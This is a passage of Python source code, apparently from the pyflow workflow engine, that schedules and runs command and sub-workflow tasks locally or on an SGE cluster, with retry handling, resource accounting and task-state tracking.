Exception("Invalid task command: '%s'" % (str(cmd))) # 2: sanitize cwd self.cwd = "" if cwd is not None and cwd != "" : self.cwd = os.path.abspath(cwd) if os.path.exists(self.cwd) and not os.path.isdir(self.cwd) : raise Exception("Cwd argument is not a directory: '%s', provided for command '%s'" % (cwd, str(cmd))) # copy env: self.env = env def __repr__(self) : if self.cmd is None : return "" if self.type == "str" : return self.cmd return " ".join(self.cmd) @staticmethod def cleanStr(s) : if isInt(s) : s = str(s) if "\n" in s : raise Exception("Task command/argument contains newline characters: '%s'" % (s)) return s.strip() class StoppableThread(threading.Thread): """ Thread class with a stop() method. The thread itself has to check regularly for the stopped() condition. Note that this is a very new thread base class for pyflow, and most threads do not (yet) check their stopped status. """ _stopAll = threading.Event() def __init__(self, *args, **kw): threading.Thread.__init__(self, *args, **kw) self._stopper = threading.Event() def stop(self): "thread specific stop method, may be overridden to add async thread-specific kill behavior" self._stopper.set() @staticmethod def stopAll(): "quick global stop signal for threads that happen to poll stopped() very soon after event" StoppableThread._stopAll.set() def stopped(self): return (StoppableThread._stopAll.isSet() or self._stopper.isSet()) def getSGEJobsDefault() : if ((siteConfig.maxSGEJobs is not None) and (siteConfig.maxSGEJobs != "") and (siteConfig.maxSGEJobs != "unlimited")) : return int(siteConfig.maxSGEJobs) return "unlimited" class ModeInfo(object) : """ Stores default values associated with each runmode: local,sge,... """ def __init__(self, defaultCores, defaultMemMbPerCore, defaultIsRetry) : self.defaultCores = defaultCores self.defaultMemMbPerCore = defaultMemMbPerCore self.defaultIsRetry = defaultIsRetry class RunMode(object): data = { "local" : ModeInfo(defaultCores=1, defaultMemMbPerCore=siteConfig.defaultHostMemMbPerCore, defaultIsRetry=False), "sge" : ModeInfo(defaultCores=getSGEJobsDefault(), defaultMemMbPerCore="unlimited", defaultIsRetry=True) } class RetryParam(object) : """ parameters pertaining to task retry behavior """ allowed_modes = [ "nonlocal" , "all" ] def __init__(self, run_mode, retry_max, wait, window, retry_mode) : if retry_mode not in self.allowed_modes : raise Exception("Invalid retry mode parameter '%s'. Accepted retry modes are {%s}." \ % (retry_mode, ",".join(self.allowed_modes))) self._retry_max = retry_max self.wait = wait self.window = window self._retry_mode = retry_mode self._run_mode = run_mode self._finalize() self.validate() def _finalize(self) : """ decide whether to turn retry off based on retry and run modes: """ if (self._retry_mode == "nonlocal") and \ (not RunMode.data[self._run_mode].defaultIsRetry) : self.max = 0 else : self.max = int(self._retry_max) def validate(self): """ check that the public parameters are valid """ def nonNegParamCheck(val, valLabel) : if val < 0 : raise Exception("Parameter %s must be non-negative" % valLabel) nonNegParamCheck(self.max, "retryMax") nonNegParamCheck(self.wait, "retryWait") nonNegParamCheck(self.window, "retryWindow") def getTaskCopy(self,retry_max, wait, window, retry_mode): """ return a deepcopy of the class customized for each individual task for any retry parameters which are not None """ taskself = copy.deepcopy(self) if retry_max is not None: taskself._retry_max = retry_max if wait is not None: taskself.wait = wait if window is not None: taskself.window = window if retry_mode is not None : taskself._retry_mode = retry_mode taskself._finalize() taskself.validate() return taskself class RunningTaskStatus(object) : """ simple object allowing remote task threads to communicate their status back to the TaskManager """ def __init__(self,isFinishedEvent) : self.isFinishedEvent = isFinishedEvent self.isComplete = threading.Event() self.errorCode = 0 # errorMessage is filled in by sub-workflow # and command-line tasks. # # Sub-workflows use this to convey whether they have # failed (1) because of failures of their own tasks or (2) # because of an exception in the sub-workflow code, in which # case the exception message and stacktrace are provided. # # command tasks use this to report the stderr tail of a failing # task # self.errorMessage = "" # only used by sub-workflows to indicate that all tasks have been specified self.isSpecificationComplete = threading.Event() class BaseTaskRunner(StoppableThread) : """ Each individual command-task or sub workflow task is run on its own thread using a class inherited from BaseTaskRunner """ def __init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) : StoppableThread.__init__(self) self.setDaemon(True) self.taskStr = taskStr self.setName("TaskRunner-Thread-%s" % (taskStr)) self.runStatus = runStatus self._sharedFlowLog = sharedFlowLog self.lock = threading.RLock() # allows taskRunner to update between queued and running status: self._setRunstate = setRunstate # this is moved into the ctor now, so that a race condition that would double-launch a task # is now not possible (however unlikely it was before): self.setInitialRunstate() def run(self) : """ BaseTaskRunner's run() method ensures that we can capture exceptions which might occur in this thread. Do not override this method -- instead define the core logic for the task run operation in '_run()' Note that for sub-workflow tasks we're interpreting raw client python code on this thread, so exceptions are *very likely* here -- this is not a corner case. """ retval = 1 retmsg = "" try: (retval, retmsg) = self._run() except WorkflowRunner._AbortWorkflowException : # This indicates an intended workflow interruption. # send a retval of 1 but not an error message pass except: retmsg = getExceptionMsg() self.runStatus.errorCode = retval self.runStatus.errorMessage = retmsg # this indicates that this specific task has finished: self.runStatus.isComplete.set() # this indicates that *any* task has just finished, so # taskmanager can stop polling and immediately sweep self.runStatus.isFinishedEvent.set() return retval def setRunstate(self, *args, **kw) : if self._setRunstate is None : return self._setRunstate(*args, **kw) def setInitialRunstate(self) : self.setRunstate("running") def flowLog(self, msg, logState) : linePrefixOut = "[TaskRunner:%s]" % (self.taskStr) self._sharedFlowLog(msg, linePrefix=linePrefixOut, logState=logState) def infoLog(self, msg) : self.flowLog(msg, logState=LogState.INFO) def warningLog(self, msg) : self.flowLog(msg, logState=LogState.WARNING) def errorLog(self, msg) : self.flowLog(msg, logState=LogState.ERROR) class WorkflowTaskRunner(BaseTaskRunner) : """ Manages a sub-workflow task """ def __init__(self, runStatus, taskStr, workflow, sharedFlowLog, setRunstate) : BaseTaskRunner.__init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) self.workflow = workflow def _run(self) : namespace = self.workflow._getNamespace() nstLabel = namespaceTypeLabel(namespace) self.infoLog("Starting task specification for %s" % (nstLabel)) self.workflow._setRunning(True) self.workflow.workflow() self.workflow._setRunning(False) self.runStatus.isSpecificationComplete.set() self.infoLog("Finished task specification for %s" % (nstLabel)) retval = self.workflow._waitForTasksCore(namespace, isVerbose=False) retmsg = "" return (retval, retmsg) class CommandTaskRunner(BaseTaskRunner) : """ Parent to local and SGE TaskRunner specializations for command tasks """ taskWrapper = os.path.join(moduleDir, "pyflowTaskWrapper.py") def __init__(self, runStatus, runid, taskStr, cmd, nCores, memMb, retry, isDryRun, outFile, errFile, tmpDir, schedulerArgList, sharedFlowLog, setRunstate) : """ @param outFile: stdout file @param errFile: stderr file @param tmpDir: location to write files containing output from the task wrapper script (and not the wrapped task) """ BaseTaskRunner.__init__(self, runStatus, taskStr, sharedFlowLog, setRunstate) self.cmd = cmd self.nCores = nCores self.memMb = memMb self.retry = retry self.isDryRun = isDryRun self.outFile = outFile self.errFile = errFile self.tmpDir = tmpDir self.schedulerArgList = schedulerArgList self.runid = runid self.taskStr = taskStr if not os.path.isfile(self.taskWrapper) : raise Exception("Can't find task wrapper script: %s" % self.taskWrapper) def initFileSystemItems(self): import pickle ensureDir(self.tmpDir) self.wrapFile = os.path.join(self.tmpDir, "pyflowTaskWrapper.signal.txt") # setup all the data to be passed to the taskWrapper and put this in argFile: taskInfo = { 'nCores' : self.nCores, 'outFile' : self.outFile, 'errFile' : self.errFile, 'cwd' : self.cmd.cwd, 'env' : self.cmd.env, 'cmd' : self.cmd.cmd, 'isShellCmd' : (self.cmd.type == "str") } argFile = os.path.join(self.tmpDir, "taskWrapperParameters.pickle") pickle.dump(taskInfo, open(argFile, 'wb')) self.wrapperCmd = [self.taskWrapper, self.runid, self.taskStr, argFile] def _run(self) : """ Outer loop of _run() handles task retry behavior: """ # these initialization steps only need to happen once: self.initFileSystemItems() startTime = time.time() retries = 0 retInfo = Bunch(retval=1, taskExitMsg="", isAllowRetry=False) while not self.stopped() : if retries : self.infoLog("Retrying task: '%s'. Total prior task failures: %i" % (self.taskStr, retries)) if self.isDryRun : self.infoLog("Dryrunning task: '%s' task arg list: [%s]" % (self.taskStr, ",".join(['"%s"' % (s) for s in self.getFullCmd()]))) retInfo.retval = 0 else : self.runOnce(retInfo) if retInfo.retval == 0 : break if retries >= self.retry.max : break elapsed = (time.time() - startTime) if (self.retry.window > 0) and \ (elapsed >= self.retry.window) : break if self.stopped() : break if not retInfo.isAllowRetry : break retries += 1 self.warningLog("Task: '%s' failed but qualifies for retry. Total task failures (including this one): %i. Task command: '%s'" % (self.taskStr, retries, str(self.cmd))) retInfo = Bunch(retval=1, taskExitMsg="", isAllowRetry=False) time.sleep(self.retry.wait) return (retInfo.retval, retInfo.taskExitMsg) def getExitMsg(self) : """ Attempt to extract exit message from a failed command task, do not complain in case of any errors in task signal file for this case. """ msgSize = None wrapFp = open(self.wrapFile) for line in wrapFp: w = line.strip().split() if (len(w) < 6) or (w[4] != "[wrapperSignal]") : break if w[5] == "taskStderrTail" : if (len(w) == 7) : msgSize = int(w[6]) break taskExitMsg = "" if msgSize is not None : i = 0 for line in wrapFp: if i >= msgSize : break taskExitMsg += line i += 1 wrapFp.close() return taskExitMsg def getWrapFileResult(self) : """ When the task is theoretically done, go and read the task wrapper to see the actual task exit code. This is required because: 1) On SGE or similar: We have no other way to get the exit code 2) On all systems, we can distinguish between a conventional task error and other problems, such as (a) linux OOM killer (b) exception in the task wrapper itself (c) filesystem failures. """ def checkWrapFileExit(result) : """ return isError=True on error in file format only, missing or incomplete file is not considered an error and the function should not return an error for this case. """ if not os.path.isfile(self.wrapFile) : return for line in open(self.wrapFile) : # an incomplete line indicates that the file is still being written: if len(line) == 0 or line[-1] != '\n' : return w = line.strip().split() if len(w) < 6 : result.isError = True return if (w[4] != "[wrapperSignal]") : result.isError = True return if w[5] == "taskExitCode" : if (len(w) == 7) : result.taskExitCode = int(w[6]) return retryCount = 8 retryDelaySec = 30 wrapResult = Bunch(taskExitCode=None, isError=False) totalDelaySec = 0 for trialIndex in range(retryCount) : # if the problem occurs at 0 seconds don't bother with a warning, but # if we've gone through a full retry cycle, then the filesystem delay is # getting unusual and should be a warning: if trialIndex > 1 : msg = "No complete signal file found after %i seconds, retrying after delay. Signal file path: '%s'" % (totalDelaySec,self.wrapFile) self.flowLog(msg, logState=LogState.WARNING) if trialIndex != 0 : time.sleep(retryDelaySec) totalDelaySec += retryDelaySec checkWrapFileExit(wrapResult) if wrapResult.isError : break if wrapResult.taskExitCode is not None : break return wrapResult def getWrapperErrorMsg(self) : if os.path.isfile(self.wrapFile) : stderrList = open(self.wrapFile).readlines() taskExitMsg = ["Anomalous task wrapper stderr output. Wrapper signal file: '%s'" % (self.wrapFile), "Logging %i line(s) of task wrapper log output below:" % (len(stderrList))] linePrefix = "[taskWrapper-stderr]" taskExitMsg.extend([linePrefix + " " + line for line in stderrList]) else : taskExitMsg = ["Anomalous task wrapper condition: Wrapper signal file is missing: '%s'" % (self.wrapFile)] return taskExitMsg class LocalTaskRunner(CommandTaskRunner) : def getFullCmd(self) : return [sys.executable] + self.wrapperCmd def runOnce(self, retInfo) : # sys.stderr.write("starting subprocess call. task '%s' cmd '%s'" % (self.taskStr,self.cmd)) # sys.stderr.write("full cmd: "+" ".join(self.getFullCmd()) + "\n") wrapFp = open(self.wrapFile, "w") proc = subprocess.Popen(self.getFullCmd(), stdout=wrapFp, stderr=subprocess.STDOUT, shell=False, bufsize=1) self.infoLog("Task initiated on local node") retInfo.retval = proc.wait() wrapFp.close() wrapResult = self.getWrapFileResult() if (wrapResult.taskExitCode is None) or (wrapResult.taskExitCode != retInfo.retval): retInfo.taskExitMsg = self.getWrapperErrorMsg() retInfo.retval = 1 return retInfo elif retInfo.retval != 0 : retInfo.taskExitMsg = self.getExitMsg() retInfo.isAllowRetry = True # success! (taskWrapper, but maybe not for the task...) return retInfo class QCaller(threading.Thread) : """ Calls to both qsub and qstat go through this run() method so that we can time them out: """ def __init__(self, cmd, infoLog) : threading.Thread.__init__(self) self.setDaemon(True) self.setName("QCaller-Timeout-Thread") self.lock = threading.RLock() self.cmd = cmd self.infoLog = infoLog self.results = Bunch(isComplete=False, retval=1, outList=[]) self.proc = None self.is_kill_attempt = False def run(self) : # Note: Moved Popen() call outside of the mutex and # stopped using proc.communicate() here after # observing python interpreter bug: # http://bugs.python.org/issue13817 # # The interpreter deadlock for this issue has been # observed to block the Popen() call below when using # python 2.7.2: # # Oct 2014 - also wrapped this call with a semaphore because # of the high memory usage associated with each qsub/qstat # subprocess. This was causing pyflow jobs to become unstable # as they would spontaneously exceed the maximum allowed master # process memory. # GlobalSync.subprocessControl.acquire() try : tmp_proc = subprocess.Popen(self.cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False) self.lock.acquire() try: self.proc = tmp_proc # handle the case where Popen was taking its good sweet time and a killProc() was sent in the meantime: if self.is_kill_attempt: self.killProc() finally: self.lock.release() if self.is_kill_attempt: return for line in self.proc.stdout : self.results.outList.append(line) self.results.retval = self.proc.wait() finally: GlobalSync.subprocessControl.release() self.results.isComplete = True @lockMethod def killProc(self) : import signal self.is_kill_attempt = True if self.proc is None : return try: os.kill(self.proc.pid , signal.SIGTERM) self.infoLog("Sent SIGTERM to sge command process id: %i" % (self.proc.pid)) except OSError : # process ended before we could kill it (hopefully rare, but possible race condition artifact) pass class SGETaskRunner(CommandTaskRunner) : def getFullCmd(self): # qsub options: # qsubCmd = ["qsub", "-V", # import environment variables from shell "-cwd", # use current working directory "-S", sys.executable, # The taskwrapper script is python "-o", self.wrapFile, "-e", self.wrapFile] qsubCmd.extend(self.schedulerArgList) qsubCmd.extend(siteConfig.qsubResourceArg(self.nCores, self.memMb)) qsubCmd.extend(self.wrapperCmd) return tuple(qsubCmd) def setInitialRunstate(self) : self.setRunstate("queued") @lockMethod def setNewJobId(self, jobId) : """ if stopped here, this is the case where a ctrl-c was entered while the qsub command was being submitted, so we must kill the job here: """ self.jobId = jobId if self.stopped(): self._killJob() def runOnce(self, retInfo) : def qcallWithTimeouts(cmd, maxQcallAttempt=1) : maxQcallWait = 180 qcall = None for i in range(maxQcallAttempt) : qcall = QCaller(cmd,self.infoLog) qcall.start() qcall.join(maxQcallWait) if not qcall.is_alive() : break self.infoLog("Trial %i of sge command has timed out. Killing process for cmd '%s'" % ((i + 1), cmd)) qcall.killProc() self.infoLog("Finished attempting to kill sge command") return qcall.results # 1) call qsub, check for errors and retrieve taskId: # if os.path.isfile(self.wrapFile): os.remove(self.wrapFile) # write extra info, just in case we need it for post-mortem debug: qsubFile = os.path.join(os.path.dirname(self.wrapFile), "qsub.args.txt") if os.path.isfile(qsubFile): os.remove(qsubFile) qsubfp = open(qsubFile, "w") for arg in self.getFullCmd() : qsubfp.write(arg + "\n") qsubfp.close() results = qcallWithTimeouts(self.getFullCmd()) isQsubError = False self.jobId = None if len(results.outList) != 1 : isQsubError = True else : w = results.outList[0].decode('utf-8').split() if (len(w) > 3) and (w[0] == "Your") and (w[1] == "job") : self.setNewJobId(int(w[2])) else : isQsubError = True if not results.isComplete : self._killJob() # just in case... retInfo.taskExitMsg = ["Job submission failure -- qsub command timed-out"] return retInfo if isQsubError or (self.jobId is None): retInfo.taskExitMsg = ["Unexpected qsub output. Logging %i line(s) of qsub output below:" % (len(results.outList)) ] retInfo.taskExitMsg.extend([ "[qsub-out] " + line.decode('utf-8') for line in results.outList ]) return retInfo if results.retval != 0 : retInfo.retval = results.retval retInfo.taskExitMsg = ["Job submission failure -- qsub returned exit code: %i" % (retInfo.retval)] return retInfo # No qsub errors detected and an sge job_number is acquired -- success! self.infoLog("Task submitted to sge queue with job_number: %i" % (self.jobId)) # 2) poll jobId until sge indicates it's not running or queued: # queueStatus = Bunch(isQueued=True, runStartTimeStamp=None) def checkWrapFileRunStart(result) : """ check wrapper file for a line indicating that it has transitioned from queued to running state. Allow for NFS delay or incomplete file """ if not os.path.isfile(self.wrapFile) : return for line in open(self.wrapFile) : w = line.strip().split() if (len(w) < 6) or (w[4] != "[wrapperSignal]") : # this could be incomplete flush to the signal file, so # don't treat it as error: return if w[5] == "taskStart" : result.runStartTimeStamp = timeStrToTimeStamp(w[0].strip('[]')) result.isQueued = False return # exponential polling times -- make small jobs responsive but give sge a break on long runs... ewaiter = ExpWaiter(5, 1.7, 60) pollCmd = ("/bin/bash", "--noprofile", "-o", "pipefail", "-c", "qstat -j %i | awk '/^error reason/'" % (self.jobId)) while not self.stopped(): results = qcallWithTimeouts(pollCmd, 6) isQstatError = False if results.retval != 0: if ((len(results.outList) == 2) and (results.outList[0].decode('utf-8').strip() == "Following jobs do not exist:") and (int(results.outList[1].decode('utf-8')) == self.jobId)) : break else : isQstatError = True else : if (len(results.outList) != 0) : isQstatError = True if isQstatError : if not results.isComplete : retInfo.taskExitMsg = ["The qstat command for sge job_number %i has timed out for all attempted retries" % (self.jobId)] self._killJob() else : retInfo.taskExitMsg = ["Unexpected qstat output or task has entered sge error state. Sge job_number: %i" % (self.jobId)] retInfo.taskExitMsg.extend(["Logging %i line(s) of qstat output below:" % (len(results.outList)) ]) retInfo.taskExitMsg.extend([ "[qstat-out] " + line.decode('utf-8') for line in results.outList ]) # self._killJob() # leave the job there so the user can better diagnose whetever unexpected pattern has occurred return retInfo # also check to see if job has transitioned from queued to running state: if queueStatus.isQueued : checkWrapFileRunStart(queueStatus) if not queueStatus.isQueued : self.setRunstate("running", queueStatus.runStartTimeStamp) ewaiter.wait() if self.stopped() : # self._killJob() # no need, job should already have been killed at the stop() call... return retInfo lastJobId = self.jobId # if we've correctly communicated with SGE, then its roll is done here # if a job kill is required for any of the error states above, it needs to be # added before this point: self.jobId = None wrapResult = self.getWrapFileResult() if wrapResult.taskExitCode is None : retInfo.taskExitMsg = ["Sge job_number: '%s'" % (lastJobId)] retInfo.taskExitMsg.extend(self.getWrapperErrorMsg()) retInfo.retval = 1 return retInfo elif wrapResult.taskExitCode != 0 : retInfo.taskExitMsg = self.getExitMsg() retInfo.retval = wrapResult.taskExitCode retInfo.isAllowRetry = True # success! (for sge & taskWrapper, but maybe not for the task...) return retInfo @lockMethod def _killJob(self) : """ (possibly) asynchronous job kill """ try : isKilled = self.isKilled except AttributeError: isKilled = False if isKilled: return try : jobId = self.jobId except AttributeError: jobId = None if jobId is None: return killCmd = ["qdel", "%i" % (int(jobId))] # don't wait for or check exit code of kill cmd... just give it one try # because we want cleanup to go as quickly as possible subprocess.Popen(killCmd, shell=False) self.isKilled = True @lockMethod def stop(self) : """ overload thead stop function to provide a qdel any running tasks. """ CommandTaskRunner.stop(self) self._killJob() class TaskFileWriter(StoppableThread) : """ This class runs on a separate thread and is responsible for updating the state and info task files """ def __init__(self, writeFunc) : StoppableThread.__init__(self) # parameter copy: self.writeFunc = writeFunc # thread settings: self.setDaemon(True) self.setName("TaskFileWriter-Thread") self.isWrite = threading.Event() def run(self) : while not self.stopped() : self._writeIfSet() time.sleep(5) self.isWrite.wait() def flush(self): self._writeIfSet() def _writeIfSet(self) : if self.isWrite.isSet() : self.isWrite.clear() self.writeFunc() class TaskManager(StoppableThread) : """ This class runs on a separate thread from workflowRunner, launching jobs based on the current state of the TaskDAG """ def __init__(self, cdata, tdag) : """ @param cdata: data from WorkflowRunner instance which will be constant during the lifetime of the TaskManager, should be safe to lookup w/o locking @param tdag: task graph """ StoppableThread.__init__(self) # parameter copy: self._cdata = cdata self.tdag = tdag # thread settings: self.setDaemon(True) self.setName("TaskManager-Thread") # lock is used for function (harvest), which is checked by # the WorkflowRunner under (literally) exceptional circumstances only self.lock = threading.RLock() # rm configuration: self.freeCores = self._cdata.param.nCores self.freeMemMb = self._cdata.param.memMb self.runningTasks = {} # This is used to track 'pyflow mutexes' -- for each key only a single # task can run at once. Key is set to True if mutex is occupied. self.taskMutexState = {} def run(self) : """ TaskManager runs so long as there are outstanding jobs """ try: cleanEnv() while not self._isTerm() : # update status of running jobs self.tdag.isFinishedEvent.clear() self.harvestTasks() # try to launch jobs: if self.stopped() : continue self._startTasks() self.tdag.isFinishedEvent.wait(5) except: msg = getExceptionMsg() self._flowLog(msg,logState=LogState.ERROR) self._cdata.emailNotification(msg, self._flowLog) self._cdata.setTaskManagerException() def _getCommandTaskRunner(self, task) : """ assist launch of a command-task """ # shortcuts: payload = task.payload param = self._cdata.param if payload.cmd.cmd is None : # Note these should have been marked off by the TaskManager already: raise Exception("Attempting to launch checkpoint task: %s" % (task.fullLabel())) isForcedLocal = ((param.mode != "local") and (payload.isForceLocal)) # mark task resources as occupied: if not isForcedLocal : if self.freeCores != "unlimited" : if (self.freeCores < payload.nCores) : raise Exception("Not enough free cores to launch task") self.freeCores -= payload.nCores if self.freeMemMb != "unlimited" : if (self.freeMemMb < payload.memMb) : raise Exception("Not enough free memory to launch task") self.freeMemMb -= payload.memMb if payload.mutex is not None : self.taskMutexState[payload.mutex] = True TaskRunner = None if param.mode == "local" or payload.isForceLocal or payload.isCmdMakePath : TaskRunner = LocalTaskRunner elif param.mode == "sge" : TaskRunner = SGETaskRunner else : raise Exception("Can't support mode: '%s'" % (param.mode)) # # TODO: find less hacky way to handle make tasks: # taskRetry = payload.retry if payload.isCmdMakePath : taskRetry = copy.deepcopy(payload.retry) taskRetry.window = 0 if param.mode == "local" or payload.isForceLocal : launchCmdList = ["make", "-j", str(payload.nCores)] elif param.mode == "sge" : launchCmdList = siteConfig.getSgeMakePrefix(payload.nCores, payload.memMb, param.schedulerArgList) else : raise Exception("Can't support mode: '%s'" % (param.mode)) launchCmdList.extend(["-C", payload.cmd.cmd]) payload.launchCmd = Command(launchCmdList, payload.cmd.cwd, payload.cmd.env) # # each commandTaskRunner requires a unique tmp dir to write # wrapper signals to. TaskRunner will create this directory -- it does not bother to destroy it right now: # # split the task id into two parts to keep from adding too many files to one directory: tmpDirId1 = "%03i" % ((int(task.id) / 1000)) tmpDirId2 = "%03i" % ((int(task.id) % 1000)) taskRunnerTmpDir = os.path.join(self._cdata.wrapperLogDir, tmpDirId1, tmpDirId2) return TaskRunner(task.runStatus, self._cdata.getRunid(), task.fullLabel(), payload.launchCmd, payload.nCores, payload.memMb, taskRetry, param.isDryRun, self._cdata.taskStdoutFile, self._cdata.taskStderrFile, taskRunnerTmpDir, param.schedulerArgList, self._cdata.flowLog, task.setRunstate) def _getWorkflowTaskRunner(self, task) : """ assist launch of a workflow-task """ return WorkflowTaskRunner(task.runStatus, task.fullLabel(), task.payload.workflow, self._cdata.flowLog, task.setRunstate) def _launchTask(self, task) : """ launch a specific task """ if task.payload.type() == "command" : trun = self._getCommandTaskRunner(task) elif task.payload.type() == "workflow" : trun = self._getWorkflowTaskRunner(task) else : assert 0 self._infoLog("Launching %s: '%s' from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace))) trun.start() self.runningTasks[task] = trun @lockMethod def _startTasks(self) : """ Determine what tasks, if any, can be started Note that the lock is here to protect self.runningTasks """ # Trace through DAG, completing any empty-command checkpoints # found with all dependencies completed, then report everything # else with completed dependencies that's ready to run (ready, completed) = self.tdag.getReadyTasks() for node in completed: if self.stopped() : return self._infoLog("Completed %s: '%s' launched from %s" % (node.payload.desc(), node.fullLabel(), namespaceLabel(node.namespace))) # launch all workflows first, then launch command tasks as resources allow: ready_workflows = [r for r in ready if r.payload.type() == "workflow"] for task in ready_workflows : if self.stopped() : return self._launchTask(task) # Task submission could be shutdown, eg. in response to a task error, so check for this state and stop if so # TODO can this be moved above workflow launch? if (not self._cdata.isTaskSubmissionActive()) : return isNonLocal = (self._cdata.param.mode != "local") # start command task launch: ready_commands = [r for r in ready if r.payload.type() == "command"] ready_commands.sort(key=lambda t: (t.payload.priority, t.payload.nCores), reverse=True) for task in ready_commands : if self.stopped() : return # In a non-local run mode, "isForceLocal" tasks are not subject to # global core and memory restrictions: isForcedLocal = (isNonLocal and task.payload.isForceLocal) if not isForcedLocal : if ((self.freeCores != "unlimited") and (task.payload.nCores > self.freeCores)) : continue if ((self.freeMemMb != "unlimited") and (task.payload.memMb > self.freeMemMb)) : continue # all command tasks must obey separate mutex restrictions: if ((task.payload.mutex is not None) and (task.payload.mutex in self.taskMutexState) and (self.taskMutexState[task.payload.mutex])) : continue self._launchTask(task) def _removeTaskFromRunningSet(self, task) : """ Given a running task which is already shown to be finished running, remove it from the running set, and recover allocated resources. """ assert(task in self.runningTasks) # shortcut: param = self._cdata.param # recover core and memory allocations: if task.payload.type() == "command" : isForcedLocal = ((param.mode != "local") and (task.payload.isForceLocal)) if not isForcedLocal : if self.freeCores != "unlimited" : self.freeCores += task.payload.nCores if self.freeMemMb != "unlimited" : self.freeMemMb += task.payload.memMb if task.payload.mutex is not None : self.taskMutexState[task.payload.mutex] = False del self.runningTasks[task] @lockMethod def harvestTasks(self) : """ Check the set of running tasks to see if they've completed and update Node status accordingly: """ notrunning = set() for task in list(self.runningTasks.keys()) : if self.stopped() : break trun = self.runningTasks[task] if not task.runStatus.isComplete.isSet() : if trun.is_alive() : continue # if not complete and thread is dead then we don't know what happened, very bad!: task.errorstate = 1 task.errorMessage = "Thread: '%s', has stopped without a traceable cause" % (trun.getName()) else : task.errorstate = task.runStatus.errorCode task.errorMessage = task.runStatus.errorMessage if task.errorstate == 0 : task.setRunstate("complete") else: task.setRunstate("error") notrunning.add(task) if not task.isError() : self._infoLog("Completed %s: '%s' launched from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace))) else: msg = task.getTaskErrorMsg() if self._cdata.isTaskSubmissionActive() : # if this is the first error in the workflow, then # we elaborate a bit on the workflow's response to # the error. We also send any email-notifications # for the first error only: msg.extend(["Shutting down task submission. Waiting for remaining tasks to complete."]) self._errorLog(msg) if self._cdata.isTaskSubmissionActive() : self._cdata.emailNotification(msg, self._flowLog) # Be sure to send notifications *before* setting error # bits, because the WorkflowRunner may decide to # immediately shutdown all tasks and pyflow threads on # the first error: self._cdata.setTaskError(task) # recover task resources: for task in notrunning : self._removeTaskFromRunningSet(task) @lockMethod def cancelTaskTree(self, task) : """ Cancel a task and all of its children, without labeling the canceled tasks as errors A canceled task will not be stopped if it is already running (this is planned for the future), but will be unqueued if it is waiting, and put into the waiting/ignored state unless it has already completed. """ # Recursively cancel child tasks: for child in task.children : self.cancelTaskTree(child) # In theory we would like to cancel running tasks, but this will take considerable extra development, # for now runningTasks will need to be ignored: if task in self.runningTasks : return # # some of the logic required for running task cancelation: # taskRunner = self.runningTasks[task] # taskRunner.stop() # self._removeTaskFromRunningSet(task) self._infoLog("Canceling %s '%s' from %s" % (task.payload.desc(), task.fullLabel(), namespaceLabel(task.namespace))) self.tdag.cancelTask(task) @lockMethod def stop(self) : StoppableThread.stop(self) for trun in list(self.runningTasks.values()) : trun.stop() @lockMethod def _areTasksDead(self) : for trun in list(self.runningTasks.values()) : if trun.is_alive(): return False return True def _isTerm(self) : # check for explicit thread stop request (presumably from the workflowManager): # if this happens we exit the polling loop # if self.stopped() : while True : if self._areTasksDead() : return True time.sleep(1) # check for "regular" termination conditions: if (not self._cdata.isTaskSubmissionActive()) : return (len(self.runningTasks) == 0) else : if self.tdag.isRunComplete() : if (len(self.runningTasks) != 0) : raise Exception("Inconsistent TaskManager state: workflow appears complete but there are still running tasks") return True elif self.tdag.isRunExhausted() : return True else : return False def _flowLog(self, msg, logState) : linePrefixOut = "[TaskManager]" # if linePrefix is not None : linePrefixOut+=" "+linePrefix self._cdata.flowLog(msg, linePrefix=linePrefixOut, logState=logState) def _infoLog(self, msg) : self._flowLog(msg, logState=LogState.INFO) def _errorLog(self, msg) : self._flowLog(msg, logState=LogState.ERROR) # payloads are used to manage the different # possible actions attributed to task nodes: # class CmdPayload(object) : def __init__(self, fullLabel, cmd, nCores, memMb, priority, isForceLocal, isCmdMakePath=False, isTaskStable=True, mutex=None, retry=None) : self.cmd = cmd self.nCores = nCores self.memMb = memMb self.priority = priority self.isForceLocal = isForceLocal self.isCmdMakePath = isCmdMakePath self.isTaskStable = isTaskStable self.isTaskEphemeral = False self.mutex = mutex self.retry = retry # launch command includes make/qmake wrapper for Make path commands: self.launchCmd = cmd if (cmd.cmd is None) and ((nCores != 0) or (memMb != 0)) : raise Exception("Null tasks should not have resource requirements. task: '%s'" % (fullLabel)) def type(self) : return "command" def desc(self) : return "command task" class WorkflowPayload(object) : def __init__(self, workflow, isTaskEphemeral=False) : self.workflow = workflow self.isTaskStable = True self.isTaskEphemeral = isTaskEphemeral def type(self) : return "workflow" def name(self) : if self.workflow is None : return "None" else : return self.workflow._whoami() def desc(self) : return "sub-workflow task" class TaskNode(object) : """ Represents an individual task in the task graph """ def __init__(self, lock, init_id, namespace, label, payload, isContinued, isFinishedEvent, isWriteTaskStatus) : self.lock = lock self.id = init_id self.namespace = namespace self.label = label self.payload = payload self.isContinued = isContinued assert(isWriteTaskStatus is not None) self.isWriteTaskStatus = isWriteTaskStatus # if true, do not execute this task or honor it as a dependency for child tasks self.isIgnoreThis = False # if true, set the ignore state for all children of this task to true self.isIgnoreChildren = False # if true, this task and its dependents will be automatically marked as completed (until # a startFromTasks node is found) self.isAutoCompleted = False # task is reset to waiting runstate in a continued run self.isReset = False self.parents = set() self.children = set() self.runstateUpdateTimeStamp = time.time() if self.isContinued: self.runstate = "complete" else: self.runstate = "waiting" self.errorstate = 0 # errorMessage is used by sub-workflow tasks, but not by command taks: self.errorMessage = "" # This is a link to the live status object updated by TaskRunner: self.runStatus = RunningTaskStatus(isFinishedEvent) def __str__(self) : msg = "TASK id: %s state: %s error: %i" % (self.fullLabel(), self.runstate, self.errorstate) return msg def fullLabel(self) : return namespaceJoin(self.namespace, self.label) @lockMethod def isDone(self) : "task has gone as far as it can" return ((self.runstate == "error") or (self.runstate == "complete")) @lockMethod def isError(self) : "true if an error occurred in this node" return ((self.errorstate != 0) or (self.runstate == "error")) @lockMethod def isComplete(self) : "task completed without error" return ((self.errorstate == 0) and (self.runstate == "complete")) @lockMethod def isReady(self) : "task is ready to be run" retval = ((self.runstate == "waiting") and (self.errorstate == 0) and (not self.isIgnoreThis)) if retval : for p in self.parents : if 